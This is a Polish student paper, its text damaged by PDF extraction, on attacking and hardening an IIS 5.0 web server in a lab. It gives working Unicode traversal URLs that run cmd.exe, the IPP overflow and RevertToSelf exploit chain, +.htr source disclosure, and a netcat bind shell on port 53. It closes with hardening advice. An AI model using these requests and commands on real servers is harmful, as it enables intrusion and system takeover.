zawadzki piotr iss5 bledy i luki w serwerze www

background image

IIS 5.0 – bł dy i luki

w serwerze WWW

background image

W pracy omówione zostan sposoby jakimi mo e posłu y si intruz zamierzaj cy włama
si do serwera IIS, by zmieni zawarto umieszczonych na nim stron lub całkowicie przej
kontrol na systemem. Pokazane zostan tak e metody zabezpieczenia serwera przed
atakiem.

Pakiet oprogramowania Internet Information Services (IIS) jest doł czony do systemu

operacyjnego Windows. Jego podstawowym zadaniem jest pełnienie funkcji serwera WWW,
ponadto oferuje równie mo liwo uruchomienia serwerów FTP, SMTP, NNTP oraz proxy.

IIS jest popularnym serwerem mi dzy innymi ze wzgl du na prostot konfiguracji. Po

zainstalowaniu składników serwera nie trzeba wiele wysiłku, eby uruchomi serwis WWW. Z
punktu widzenia u ytkowników niezajmuj cych si systemami komputerowymi ani
bezpiecze stwem, jest to du a zaleta. Jest to jednak równie du a zaleta dla intruzów.

Wi kszo u ytkowników poprzestaje na podstawowej instalacji IIS, nie staraj c si

dodatkowo zabezpieczy serwera. Zwykle wi c serwer IIS działa z domy ln konfiguracj , co
sprawia e jest on cz stym celem ataków.

W eksperymentach korzysta b d z dwóch wirtualnych maszyn. Na jednej z nich

zainstalowany jest system operacyjny

Windows 2000 Professional

oraz pakiet IIS 5.0 z

domy lnymi ustawieniami (IP:

192.168.239.130

) – komputer b d cy ofiar ataków. Druga

maszyna działa pod systemem

Mandrake Linux 10.1

(IP:

192.168.239.131

) – komputer

intruza.

J

AK ROZPOZNA SERWER

IIS

Aby rozpocz atak na serwer IIS intruz musi si najpierw upewni , e jego celem

jest rzeczywi cie serwer IIS. Jednym ze sposobów w jaki mo e to zrobi jest tzw. badanie
banerów
.

Proces pobierania strony z serwera polega na wysyłaniu

da (od klienta do

serwera) i otrzymaniu odpowiedzi (od serwera do klienta). W skład odpowiedzi serwera
wchodzi zawarto strony oraz nagłówki HTTP. Domy lnie skonfigurowany serwer IIS bez
wahania ujawnia swoj to samo , wysyłaj c nast puj cy nagłówek:


Server: Microsoft-IIS/5.0

background image

Technik t mo na zastosowa poprzez poł czenie si z portem 80 serwera i wysłanie
odpowiedniego ci gu znaków jako danie, a nast pnie odczytanie nagłówków otrzymanej
odpowiedzi.

Do nawi zania poł czenia TCP z okre lonym portem danego serwera mo na

posłu y si narz dziem

netcat

. [

http://netcat.sourceforge.net/

]

Po zainicjowaniu poł czenia poleceniem

nc 192.168.239.130 80

wpisujemy danie:

GET / HTTP/1.0

, a nast pnie pusty wiersz. W odpowiedzi od serwera widzimy zapis:

Server: Microsoft-IIS/5.0

.

Oznacza to, e na komputerze 192.168.239.130 jest

uruchomiony IIS w wersji 5.0.
Przykład zastosowania tej metody został pokazany na rysunku poni ej.

Chc c zabezpieczy serwer przed identyfikacj poprzez badanie banera, powinni my

zmieni tre odpowiedzi banera. Nie jest to proste, poniewa w serwerze IIS 5.0 tre
banera jest na stałe zapisana w kodzie programu. Mo na jednak skorzysta z narz dzia
UrlScan. W pliku konfiguracyjnym urlscan.ini zmieniamy wpis


RemoveServerHeader=0

na


RemoveServerHeader=1

Po wprowadzeniu tej zmiany z nagłówków odpowiedzi znika informacja o typie

serwera.
Wi cej

o

UrlScan

na

stronie:

[

https://www.microsoft.com/poland/technet/security/tools/urlscan.mspx

]

background image

Po sprawdzeniu, e mamy do czynienia z serwerem IIS, rozpoczynamy testowanie,

na jakie metody ataku jest on podatny.

P

RZEGL DANIE SYSTEMU PLIKÓW

Ataki zwane przegl danie systemu plików (ang. filesystem traversal) umo liwiaj

odczytywanie plików znajduj cych si na serwerze, a niekiedy nawet zdalne wykonywanie
polece .

Idea jest prosta – korzystaj c z tradycyjnej sztuczki

../

mo emy uzyska dost p do

dowolnego pliku na serwerze, a nawet wykonywa polecenia (uruchamiaj c cmd.exe).

Symbol

../

u ywany jest w URL-u w podobny sposób jak podczas zmiany bie cego

katalogu w wierszu polece .
Przykład: Je li jeste my w katalogu c:\temp\katalog, to po wywołaniu polecenia

cd..

znajdziemy si stopie wy ej, czyli w katalogu c:\temp.
W przypadku URL sytuacja wygl da analogicznie. Umieszczaj c

../

w daniu wysłanym

do serwera, intruz b dzie mógł porusza si po drzewie katalogów serwera.
Gdyby my wysłali nast puj ce danie:


http://192.168.239.130/dokumenty/2004/info.html

w odpowiedzi otrzymaliby my plik \dokumenty\2004\info.html z głównego katalogu serwera
WWW.

Je li

głównym

katalogiem

jest

c:\inetpub,

otrzymaliby my

plik

c:\inetpub\dokumenty\2004\info.html. Je li natomiast wysłaliby my danie:


http://192.168.239.130/dokumenty/2004/../2003/info.html

otrzymaliby my plik c:\inetpub\dokumenty\2003\info.html. Umieszczaj c symbol dwóch
kropek spowodowali my zmian katalogu z 2004 na katalog nadrz dny dokumenty,
nast pnie dostali my si do katalogu 2003, sk d za dali my pliku info.html.

W obu przypadkach nie przekroczyli my naszych praw. Odczytali my plik znajduj cy

si w c:\inetpub. Co jednak stałoby si gdyby my chcieli odczyta plik:


http://192.168.239.130/../plik.txt

W tej sytuacji dwie kropki przenosz z katalogu c:\inetpub do katalogu nadrz dnego c:\, w
którym znajduje si plik plik.txt. Je li faktycznie udałoby si nam odczyta ten plik,

background image

oznaczałoby to, e uzyskali my dost p do informacji nie udost pnionych dla u ytkowników
serwera WWW. Ponadto, gdyby my tylko znali struktur katalogów serwera, mogliby my
dosta si do ka dego pliku. Przyjrzyjmy si kilku przykładom.

Przegl danie systemu plików za pomoc Unicode

Zasadniczo IIS 5.0 nie jest podatny na sztuczki z wykorzystaniem symbolu

../

-

przed wysłaniem pliku klientowi serwer sprawdza, czy w cie ce dost pu nie wyst puje ci g

../

mog cy spowodowa wyj cie z głównego katalogu. Interesuj ca sytuacja ma miejsce,

gdy w cie ce wyst puj znaki Unicode. W takim przypadku IIS najwyra niej sprawdza

cie k przed dekodowaniem tych znaków. Oznacza to, e po odebraniu dania:


http://192.168.239.130/..%c0%afplik.txt

IIS w pierwszej kolejno ci sprawdza, czy danie nie zawiera podejrzanego symbolu

../.

Nast pnie dekoduje znaki Unicode. Ci g %c0%af odpowiada znakowi

/

w Unicode, tak wi c

danie przetwarzane jest do nast puj cej postaci:


http://192.168.239.130/../plik.txt

co oznacza, e IIS dostarczy nam plik c:\plik.txt.

Wykorzystuj c t luk jeste my w stanie uzyska dost p do dowolnego pliku na

serwerze, pod warunkiem, e znamy cie k dost pu do niego. Dost p uzyskamy z
uprawnieniami konta IUSR_NAZWAKOMPUTERA, gdzie NAZWAKOMPUTERA jest
netbiosow nazw serwera. To konto jest wykorzystywane do anonimowego dost pu z sieci
do serwera WWW. Standardowo nale y ono do grupy Go cie (Local Guests) na serwerze.
Uprawnienia tego konta przyznawane s anonimowym u ytkownikom serwera WWW.
Poza kontem IUSR_NAZWAKOMPUTERA, mamy jeszcze konto SYSTEM (LocalSystem).
Jest ono wykorzystywane przez system operacyjny do uruchamiania programów i
sterowników. Nie jest kontem u ytkownika. Konto to ma nieograniczony dost p do systemu
operacyjnego. Je li intruzowi udałoby si przej kontrol nad tym kontem, mógłby zrobi z
systemem praktycznie wszystko.

Załó my e znamy lokalizacj pliku, do którego chcemy uzyska dost p. Aby wysła

danie mo emy skorzysta z przegl darki lub wysła

danie HTTP bezpo rednio, za

pomoc programu netcat. W pierwszym przypadku wpisujemy je w polu adresu przegl darki,
w drugim natomiast post pujemy podobnie jak przy badaniu banerów, tj. wpisuj c:

background image


nc 192.168.239.130 80

GET /..%c0%afplik.txt

Je li plik, którego dotyczy

danie, jest plikiem wykonywalnym, uzyskujemy

dodatkowe mo liwo ci. Je li znajduj si on w katalogu wirtualnym, w którym u ytkownik
IUSR_NAZWAKOMUTERA ma prawo wykonywania (na przykład /scripts), wówczas zostanie
wykonany, a wynik zostanie zwrócony przez serwer.

Mo emy ponadto oszuka serwer, by uznał, e plik znajduje si w katalogu z prawem

wykonywania nawet, je li faktycznie jest inaczej. Wykorzystuj c ponownie sztuczk z
dwiema kropkami wchodzimy do katalogu /scripts, po czym wychodzimy do katalogu
nadrz dnego i podajemy cie k dost pu do pliku w innym katalogu.

Przykład:


http://192.168.239.130/scripts/..%c0%af../winnt/system32/cmd.exe

Serwer IIS b dzie s dził, e plik znajduje si w katalogu scripts – cie ka jest analizowana
zanim ci g ..%c0%af.. zostanie zdekodowany do postaci ../.. . Serwer nie wie zatem, e po
wej ciu do katalogu scripts przechodzimy dwa poziomy wy ej i próbujemy uzyska dost p
do /winnt/system32/cmd.exe.

Warto wiedzie , e do wywoływanego pliku mo emy przekazywa argumenty,

posługuj c si znakiem

?.

Przykład:
Chc c wypisa zawarto katalogu c:\ wysyłamy nast puj ce danie:


http://192.168.239.130/scripts/..%c0%af../winnt/system32/cmd.exe?/c+

dir+c:\

danie mo emy wysła za pomoc przegl darki lub programu netcat

background image

Luka przegl dania systemu plików została poprawiona w Windows 2000 Service Pack 3.

A

TAKI PRZEZ PRZEPEŁNIENIE BUFORA


Atak przez przepełnienie bufora, w skrócie, polega na przekazaniu programowi zbyt du ej
ilo ci danych, powoduj c wykonanie przygotowanego przez intruza kodu, który w
normalnych okoliczno ciach nie miałby prawa zosta wykonany. Dodatkowy kod trafia do
innego obszaru pami ci i wskutek bł du w programie, który niewła ciwie sprawdza rozmiar
danych wej ciowych, zostaje wykonany z uprawnieniami takimi samymi, jak wadliwy
program.

Poniewa IIS działa na koncie SYSTEM, które w Windows ma nieograniczon

władz , przepełnienie bufora nale y uwa a za najbardziej niebezpieczny rodzaj ataku, na
jaki nara ony jest serwer IIS.

Przepełnienie bufora IPP

Luka ta wyst puje w filtrze ISAPI .printer, którego zadaniem jest obsługa protokołu

Internet Printing Protocol (IPP). Sama technologia ISAPI (Internet Services Application
Programming Interface) umo liwia rozszerzanie funkcjonalno ci serwera WWW poprzez
doł czanie do niego kodu implementuj cego dodatkowe usługi.

background image

Filtr ISAPI .printer jest domy lnie instalowany na serwerze. Bł d mo na wykorzysta

wysyłaj c ci g około 420 bajtów w nagłówku wysłanym w

daniu ISAPI .printer. Po

otrzymaniu takiego

dania w IIS dochodzi do przepełnienia bufora i serwer przestaje

działa . Jednak Windows 2000 automatycznie uruchamia IIS ponownie zaraz po awarii, co
ma na celu zapewnienie jak najwi kszej niezawodno ci usług sieciowych. W efekcie kod
umieszczony w buforze zostaje wykonany.

Luk wykorzystuje exploit zwany

jill

[

http://packetstormsecurity.org

], którego autorem

jest dark spirit z beavuh.org. Exploit powoduje przepełnienie bufora w serwerze IIS i
uruchamia na zdalnej maszynie powłok , do której dost p mo e uzyska intruz ł cz c si z
portem o wybranym numerze.

Intruz rozpoczyna od nasłuchiwania na wybranym porcie TCP (np. 2006), za pomoc

takiego narz dzia jak netcat:


nc –vv –l –p 2006

W drugim oknie polece intruz uruchamia exploita, podaj c mu jako parametry: IP

ofiary, IP maszyny nasłuchuj cej oraz numer portu, na którym ma zosta udost pniona
powłoka.
Intruz jeszcze tylko musi wcisn [Enter] w okienku nasłuchiwania by poł czy si z
powłok . Nast pnie mo e wywoływa dowolne polecenia z uprawnieniami konta SYSTEM.

background image

Bł d został naprawiony w Windows 2000 SP3.

U

JAWNIANIE KODU RÓDŁOWEGO

Gdy klient wysyła do serwera danie otworzenia strony HTML, serwer bezpo rednio

odsyła mu jej zawarto . Kiedy

danie dotyczy strony zrealizowanej w ASP lub PHP,

wówczas w pierwszej kolejno ci serwer wykonuje kod zawarty w skrypcie, a potem wysyła
wyniki klientowi. W ten sposób klient nie ma dost pu do kodu ródłowego strony (skryptu),
któr ogl da. Ten fakt jest niekiedy wykorzystywany przez programistów, którzy umieszczaj
w kodzie stron poufne informacje, jak cho by nazwy u ytkowników i hasła.
Przykładowo, logowanie u ytkownika mo e wygl da nast puj co:


if ( $username==”admin”) && ($passwd==”secret77”) )

{

$logged_in=1;

}

background image

W normalnych okoliczno ciach takie rozwi zanie nie jest niebezpieczne, poniewa

u ytkownik nie mo e zobaczy tre ci kodu ródłowego. Je li jednak znalazłby luk w
serwerze IIS umo liwiaj c podgl d kodu stron, wówczas hasło zostałoby ujawnione.

Luka +.htr

HTR jest jedn z pierwszych zaawansowanych technik skryptowych, jakie weszły w

skład serwera IIS 2.0. Obecnie najcz ciej spotykanym zastosowaniem mechanizmu HTR
jest zestaw skryptów doł czonych standardowo do serwera IIS. Ich zadaniem jest
umo liwienie dost pu do haseł Windows NT przez serwer WWW. U ytkownicy mog za
pomoc tych skryptów zmienia swoje hasła, natomiast administratorzy mog
wykorzystywa je w zarz dzaniu hasłami.

Gdy klient wysyła danie pliku .htr jest ono przekazywane do biblioteki ISM.DLL,

która wskutek bł du zwraca zawarto pliku. W ten sposób intruz mo e odczyta tre pliku
.htr.

Ten sam bł d mo e by wykorzystany do odczytania zawarto ci pliku .asp.

Wybieramy cie k dost pu do dowolnego pliku .asp:


http://192.168.239.130/global.asa

i dodajemy do niej +.htr:


http://192.168.239.130/global.asa+.htr

Gdy serwer IIS analizuje otrzymane danie, zwraca uwag na ko cowy ci g znaków .htr,
wi c post puje tak samo jak w przypadku dowolnego pliku .htr – przekazuje danie do
biblioteki ISM.DLL. ISM.DLL usuwa ze cie ki przyrostek +.htr i pokazuje zawarto pliku
/global.asa.

W podobny sposób mo na post pi z plikami .asp i .ini. Jednak odczytana zostanie

tre ródła pliku tylko do pierwszego wyst pienia ci gu

<%

- znaczniki

<%

i

%>

s

ogranicznikami skryptów wykonywanych po stronie serwera.

Chc c odczyta plik global.asa, intruz musi jedynie uruchomi program netcat i

wpisa

danie

GET /global.asa+.htr.

Oczywi cie mo e równie skorzysta z

przegl darki i wpisa nast puj cy adres:

background image

http://192.168.239.130/global.asa+.htr

Dost p do poufnych informacji (na przykład nazwy u ytkownika i hasła) mo e

znacz co ułatwi intruzowi włamanie do systemu. Najskuteczniejsz ochron przed
ujawnieniem ukrytych informacji jest przestrzeganie zasad bezpiecznego programowania w
kodzie ASP.
Luka została naprawiona w Windows 2000 SP3.

Z

WI KSZANIE UPRAWNIE

Intruz, który zdołał wedrze si do systemu i uruchomi powłok z uprawnieniami

konta SYSTEM ma prawie nieograniczone mo liwo ci. Jednak nawet, gdy intruz dysponuje
jedynie uprawnieniami konta anonimowego lub nieuprzywilejowanego, mo e dokona
zniszcze w systemie lub nawet przej uprawnienia konta SYSTEM.

Jak kopiowa pliki na system ofiary

Gdy jeste my zalogowani lokalnie do komputera z systemem Windows, mo emy

łatwo przekierowywa wyniki wykonywanego polecenia stosuj c symbol

>.

Przykładowo, je li wydamy nast puj ce polecenie:


dir c:\ > dirc.txt

wyniki polecenia trafi do pliku dirc.txt.

Metody tej nie mo na jednak stosowa w przypadku polece wykonywanych za

po rednictwem cmd.exe ze wzgl du na ograniczenia przekierowa w serwerze IIS, chyba,

e zmienimy nazw cmd.exe. Dlatego te pierwsz rzecz , jak robi intruz, jest skopiowanie

background image

pliku cmd.exe do katalogu /scripts (podstawowe ustawienia bezpiecze stwa Windows 2000
daj u ytkownikowi nale cemu do grupy Wszyscy (Everyone) pełn kontrol nad tym
katalogiem). Intruz wpisuje w przegl darce nast puj cy adres:


http://192.168.239.130/scripts/..%c0%af../winnt/system32/cmd.exe?+/c

+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmdx.exe

Kopia cmd.exe została umieszczona w katalogu /scripts, zatem intruz nie b dzie

musiał wykonywa adnych sztuczek z przechodzeniem do innego katalogu, by uzyska do
niej dost p. Łatwiej b dzie mu wydawa polecenia w systemie ofiary.


background image

Jak tworzy pliki w systemie ofiary

Wydaj c polecenie w rodzaju

echo > plik

, intruz ma mo liwo tworzenia nowych

plików w zdalnym systemie za pomoc przegl darki, w której wpisuje adres:


http://192.168.239.130/scripts/cmdx.exe?+/c+echo+zawartosc+pliku+>+n

owy.txt

Spowoduje to utworzenie pliku nowy.txt w katalogu /scripts.

A

TAK NA SERWER

IIS

ANALIZA KROK PO KROKU

Przeanalizujmy teraz szczegółowy opis ataku na serwer IIS. Zobaczymy, jak serwer

IIS ze standardowymi zabezpieczeniami, bez jakichkolwiek uaktualnie czy łat, pada ofiar
intruza, który w pi ciu krokach zdobywa w systemie uprawnienia konta SYSTEM.

Krok 1 – poszukiwanie luk

Najpierw intruz sprawdza, czy system jest podatny na atak Unicode.

background image

Wygl da na to, e system jest podatny, poniewa udało si odczyta list plików w

katalogu c:\.

Krok 2 – przygotowanie do umieszczenia plików na serwerze

Chc c kontynuowa atak, intruz musi umie ci na serwerze kilka plików. Mo na tu

skorzysta ze skryptu perla

unicodeloader

[

http://packetstormsecurity.org/

] – narz dzia,

które umo liwia przesyłanie plików za po rednictwem wygodnego interfejsu.

Skrypt unicodeloader umieszcza na serwerze plik pomocniczy, który intruz otwiera

(wpisuj c okre lony adres), otrzymuj c stron z formularzem słu cym do przesyłania plików
z komputera lokalnego na serwer.
Wywoływany jest nast puj co:


unicodeloader IP:port katalogwww

Jako

katalogwww

podajemy

nazw

katalogu,

w

którym

u ytkownik

IUSR_NAZWAKOMPUTERA mo e wykonywa pliki. Jak zd yli my si przekona , warunek
ten spełnia katalog c:\inetpub\scripts.

background image

Intruz mo e od tej pory przesyła pliki na serwer korzystaj c ze strony upload.asp.

Krok 3 – umieszczenie plików na serwerze

Po

wpisaniu

w

przegl darce

adresu

http://192.168.239.130/scripts/upload.asp

, intruz b dzie mógł za pomoc kilku

klikni umieszcza pliki w katalogu wirtualnym /scripts.

W kolejnym kroku intruz umieszcza na serwerze pliki niezb dne do przeprowadzenia

dalszej cz ci ataku. B dzie mu potrzebny plik, który umo liwi przej cie uprawnie konta

background image

SYSTEM. W tym celu wykorzystana zostanie luka znana jako RevertToSelf w bibliotece DLL
ISAPI. Luka wyst puje w mechanizmie InProcessIsapiApps, umo liwiaj cym omijanie
zabezpiecze aplikacji przy u yciu wywoła RevertToSelf w DLL ISAPI. W uproszczeniu,
wywołanie RevertToSelf spowoduje, e bie cy w tek zmieni swój kontekst bezpiecze stwa
z uprawnie IUSR_NAZWAKOMPUTERA na uprawnienia konta, z którego prawami działa
IIS (inetinfo.exe) czyli SYSTEM.

HD

Moore

z

digitaloffence.net

udost pnia

plik

iiscrack.dll

[

http://metasploit.com/users/hdm/tools/

], który wykorzystuje omówion luk i umo liwia

wykonywanie dowolnych polece z uprawnieniami konta SYSTEM.

By zastosowa exploit nale y zmieni nazw tego pliku na nazw okre lon w kluczu

Metabazy IIS/LM/W3SVC/InProcessIsapiApps. Intruz musi zatem jedynie otworzy stron
upload.asp i umie ci na serwerze plik o nazwie zmienionej na httpodbc.dll.
Wspomniany bł d został naprawiony w Windows 2000 SP3.


Nast pnym punktem planu intruza jest przygotowanie tylnej furtki w systemie ofiary.

Intruz

mo e

zastosowa

program

netcat

(wersja

dla

Windows)

[

http://www.vulnwatch.org/netcat/

], który mo e umie ci na serwerze korzystaj c ze strony

upload.asp.

Krok 4 – uruchomienie tylnej furtki z uprawnieniami konta SYSTEM

Aby wywoła httpodbc.dll w katalogu wirtualnym /scripts, intruz po prostu wpisuje w

przegl darce adres:


http://192.168.239.130/scripts/httpodbc.dll

Uzyskuje w ten sposób dost p do strony, na której znajduje si pole tekstowe umo liwiaj ce
wydawanie polece . Wpisane polecenie zostanie wykonane z uprawnieniami konta
SYSTEM.

Podczas testowania, okazało si , e nie do ko ca działa to poprawnie. Przy wydaniu
polecenia:


c:\winnt\system32\cmd.exe /c

background image

pojawiał si nast puj cy bł d

Wystarczyło jednak w adresie


http://192.168.239.130/scripts/httpodbc.dll?MfcISAPICommand=Exploit&

cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc&submitter=execute

skasowa ostatni człon:

background image


&submitter=execute

co sprawiło, e exploit zadziałał.

Intruz wydaje wi c nast puj ce polecenie:


c:\inetpub\scripts\nc –l –p 53 –e cmd.exe

I tak jak wcze niej kasuje ostatni człon w adresie, tj.

background image


&submitter=execute

W efekcie zobaczy on stron z potwierdzeniem poprawnego wykonania polecenia.

Uruchamia ono powłok dost pn przez port TCP o numerze 53. Wybór numeru

portu ma znacznie, poniewa gdyby atakowany serwer znajdował si za firewallem, istnieje
spora szansa na to, e b dzie on akceptował poł czenia AXFR DNS (port TCP 53).

Krok 5 – ostateczny cios

Intruzowi pozostaje jedynie poł czy si z powłok , któr uruchomił. Mo e w tym celu

wykorzysta program netcat.

background image

J

AK POPRAWI BEZPIECZE STWO

Oto kilka metod post powania słu cych poprawie poziomu bezpiecze stwa serwera

IIS, których stosowanie znacznie ograniczy ryzyko włamania.

1. Na wst pie kilka wa nych wskazówek odno nie instalacji:

o

przygotujmy oddzieln partycj lub oddzielny dysk dla zawarto ci stron WWW

– udaremni to wi kszo z omówionych ataków. Narz dzia słu ce do
włamywania si na serwery IIS zakładaj zwykle, e strony WWW s
przechowywane w standardowych katalogach.

o

partycja systemowa oraz partycja zawieraj ca strony WWW powinny by

partycjami NTFS. Pozwala to w wi kszym stopniu kontrolowa ustawienia
bezpiecze stwa, korzystaj c z list kontroli dost pu (ang. Access Control List -
ACL).

o

instalujmy najnowsze pakiety uaktualnie i łaty.

2. Usu my z serwera przykładowe aplikacje i katalogi. Przykłady nie s do niczego

potrzebne na pracuj cym serwerze. Post pujmy według zasady: je li co nie jest
nam potrzebne, usu my to.

background image

3. Wył czmy wszystkie zb dne usługi, szczególnie serwer telnetu, je li z niego nie

korzystamy.

4. Powinni my ponadto rozwa y podział plików udost pnianych na stronach pomi dzy

odr bne katalogi.

5. IIS jest wst pnie skonfigurowany tak, by obsługiwa podstawowe typy plików, takie

jak .asp i .shtm. Gdy serwer odbiera danie dotycz ce jednego z takich plików, jest
ono obsługiwane przez bibliotek DLL. Je li obsługa niektórych plików nie jest nam
potrzebna, usu my ich mapowania, post puj c zgodnie z poni sz instrukcj :

o

otwieramy Menad era usług internetowych (Internet services manager),

o

klikamy prawym przyciskiem na nazw serwera, wybieramy z menu

Wła ciwo ci (Properties),

o

wła ciwo ci główne (Master Properties),

o

wybieramy Usługa WWW->Edytuj->Katalog macierzysty->Konfiguracja

(WWW Service->Edit->HomeDirectory->Configuration).




Bibliografia:
- Magazyn „Hakin9” nr 4/2004
- „Wykrywanie, analiza i przeciwdziałanie atakom hackerów w Checz Point Firewall-1 NG
[

www.clico.pl

]

- strony www wymienione w pracy


Wyszukiwarka

Podobne podstrony:
04 Zadanie serwer WWW
Definiowanie katalogów wirtualnych serwera WWW
05 WAI serwery www 2013
Własny serwer WWW i FTP w Windows XP, Windows XP, Vista - pomoce
Adaptatywne serwery WWW GF23YAX Nieznany (2)
Definiowanie wirtualnego serwera WWW dla potrzeb gazetki szkolnej
Informatyka dla gimnazjum Zeszyt Ćwiczeń Serwer WWW wraz z bazą
Apache Zabezpieczenia aplikacji i serwerów www
02 Linux Konfiguracja serwera WWW APACHE
INSTALACJA SERWERA WWW NA W DOC
Apache Zabezpieczenia aplikacji i serwerow WWW apazab
Ubuntu linux Wlasny serwer www
Serwer WWW i ustawienia PHP
Apache Zabezpieczenia aplikacji i serwerow WWW apazab
Własny serwer WWW i FTP w Windows XP
serwer www apache
ZASTOSOWANIA Serwery WWW Apache
Adaptatywne serwery WWW

więcej podobnych podstron